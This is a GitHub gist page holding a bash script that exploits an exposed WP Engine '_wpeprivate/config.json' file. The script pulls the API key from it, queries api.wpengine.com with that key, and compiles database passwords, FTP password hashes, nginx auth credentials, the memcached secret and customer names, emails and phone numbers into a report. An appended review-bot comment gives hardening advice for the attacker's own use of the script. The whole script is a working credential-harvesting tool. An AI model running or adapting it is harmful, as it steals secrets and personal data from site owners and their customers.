hateshape revised this gist
May 5, 2019 . 1 changed file with 1 addition and 1 deletion.
@@ -44,7 +44,7 @@ echo -e ${BLUE}"Nginx Auth - "${GREEN} >> $ACCOUNTNAME-report.txt jq -r '.nginx_basic_auth_staging' $ACCOUNTNAME-site.json | grep -E '(user)|(password)' | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt echo -e ${BLUE}"\nMiscellaneous - "${GREEN} >> $ACCOUNTNAME-report.txt grep -E '(gopher_enabled)|(memcached_secret)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g'|sed 's/,//' >> $ACCOUNTNAME-report.txt echo -e ${BLUE}"\nUser Info - "${GREEN} >> $ACCOUNTNAME-report.txt echo "domain:"$(jq -r '.domain' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt -
hateshape created this gist
Jan 22, 2019 .
@@ -0,0 +1,59 @@ #!/bin/bash # If you find a site with /_wpeprivate/config.json file exposed, run this and get all kinds of fun goodies. # If it "no worked" (Technical Term) then you probably need to install jq! TARGET=$1 TARGETDOMAIN=$(echo $TARGET | cut -d/ -f3) # Pretty Colors RESET='\033[00m' GREEN='\033[01;32m' BLUE='\033[01;34m' echo -e ${BLUE}"------------------------ Downloading '_wpeprivate/config.json' -------------------------"${RESET} echo -e ${GREEN}"curl -so $TARGETDOMAIN-config.json -k $TARGET/_wpeprivate/config.json"${RESET} curl -so $TARGETDOMAIN-config.json -k $TARGET/_wpeprivate/config.json WPEAPIKEY=$(jq '.' $TARGETDOMAIN-config.json | grep wpengine_apikey | awk '{print $2}' | cut -d, -f1 | sed 's/"//g') ACCOUNTNAME=$(jq '.' $TARGETDOMAIN-config.json | grep WPENGINE_ACCOUNT | awk '{print $2}' | cut -d, -f1 | sed 's/"//g' | sort -u) echo -e ${BLUE}"\n-------------------------- Make 1st API Call to api.wpengine.com -----------------------"${RESET} echo -e ${GREEN}"curl -so $ACCOUNTNAME-site.json -k https://api.wpengine.com/1.2/?method=site&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"${RESET} curl -so $ACCOUNTNAME-site.json -k "https://api.wpengine.com/1.2/?method=site&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY" echo -e ${BLUE}"\n-------------------------- Make 2nd API Call to api.wpengine.com -----------------------"${RESET} echo -e ${GREEN}"curl -so $ACCOUNTNAME-customer.json -k https://api.wpengine.com/1.2/?method=customer-record&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY"${RESET} curl -so $ACCOUNTNAME-customer.json -k "https://api.wpengine.com/1.2/?method=customer-record&account_name=$ACCOUNTNAME&wpe_apikey=$WPEAPIKEY" echo -e ${BLUE}"\n----------------------------- Report - $(echo $TARGETDOMAIN) - $(echo $ACCOUNTNAME) -----------------------------"${RESET} echo -e ${BLUE}"Configuration Info - "${GREEN} >> $ACCOUNTNAME-report.txt grep -E '(site)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt 
grep -E '(server_name)|(wp_version)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt echo -e ${BLUE}"\nDomains - "${GREEN} >> $ACCOUNTNAME-report.txt jq -r '.all_domains' $ACCOUNTNAME-site.json | sed ':a;N;$!ba;s/\n//g' | sed 's|[{}"[]||g' | sed 's/ //g' | cut -d] -f1 >> $ACCOUNTNAME-report.txt echo -e ${BLUE}"\nDatabase Infos - "${GREEN} >> $ACCOUNTNAME-report.txt echo "db_password:"$(jq -r '.db_password' $ACCOUNTNAME-site.json) >> $ACCOUNTNAME-report.txt echo -e "db_password_encryption" >> $ACCOUNTNAME-report.txt jq -r '.db_password_encryption' $ACCOUNTNAME-site.json | sed -e $'s/,/\\\n/g' | sed 's|[{}",]||g' >> $ACCOUNTNAME-report.txt echo -e ${BLUE}"\nFTP Users and Password Hashes - "${GREEN} >> $ACCOUNTNAME-report.txt jq '.ftp_users | to_entries[]' $ACCOUNTNAME-site.json | sed 's|[{},]||g' | awk '{print $1 $2}' | sed 's/"//g' | grep -vE '(value:)|(^$)' | sed 's/path:/&\n/g' >> $ACCOUNTNAME-report.txt echo -e ${BLUE}"Nginx Auth - "${GREEN} >> $ACCOUNTNAME-report.txt jq -r '.nginx_basic_auth_staging' $ACCOUNTNAME-site.json | grep -E '(user)|(password)' | cut -d\" -f2-4 | sed 's/"//g' >> $ACCOUNTNAME-report.txt echo -e ${BLUE}"\nMiscellaneous - "${GREEN} >> $ACCOUNTNAME-report.txt grep -E '(gophpr_enabled)|(memcached_secret)' $ACCOUNTNAME-site.json | cut -d\" -f2-4 | sed 's/"//g'|sed 's/,//' >> $ACCOUNTNAME-report.txt echo -e ${BLUE}"\nUser Info - "${GREEN} >> $ACCOUNTNAME-report.txt echo "domain:"$(jq -r '.domain' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt echo "account_id:"$(jq -r '.account_id' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt echo "account_type:"$(jq -r '.account_type' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt echo "full_name:"$(jq -r '.full_name' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt echo "email:"$(jq -r '.email' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt echo "phone:"$(jq -r '.phone' $ACCOUNTNAME-customer.json) >> $ACCOUNTNAME-report.txt echo -e 
${GREEN} cat $ACCOUNTNAME-report.txt echo -e ${BLUE}"----------------------------------------------------------------------------------------"${RESET}
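Review bot: `ACCOUNTNAME` is parsed out of the downloaded config.json and then used unquoted as the filename prefix for both `curl -so` calls and every `>> $ACCOUNTNAME-report.txt` redirect, so server-controlled JSON containing `/`, `..` or whitespace (or nothing at all, if the download failed) decides where the script writes on the operator's machine. Validate it right after extraction, for example `[[ $ACCOUNTNAME =~ ^[A-Za-z0-9_-]+$ ]] || exit 1`, and double-quote the expansions; `TARGETDOMAIN` deserves the same treatment. The report file accumulates plaintext `db_password`, `memcached_secret` and customer contact fields under the default umask, so a `umask 077` near the top would keep evidence from an authorised assessment from being readable by other local users. Both requests to api.wpengine.com also pass `-k`, which turns off certificate verification while the API key travels in the query string and is echoed to the terminal; dropping `-k` on those two calls removes that exposure.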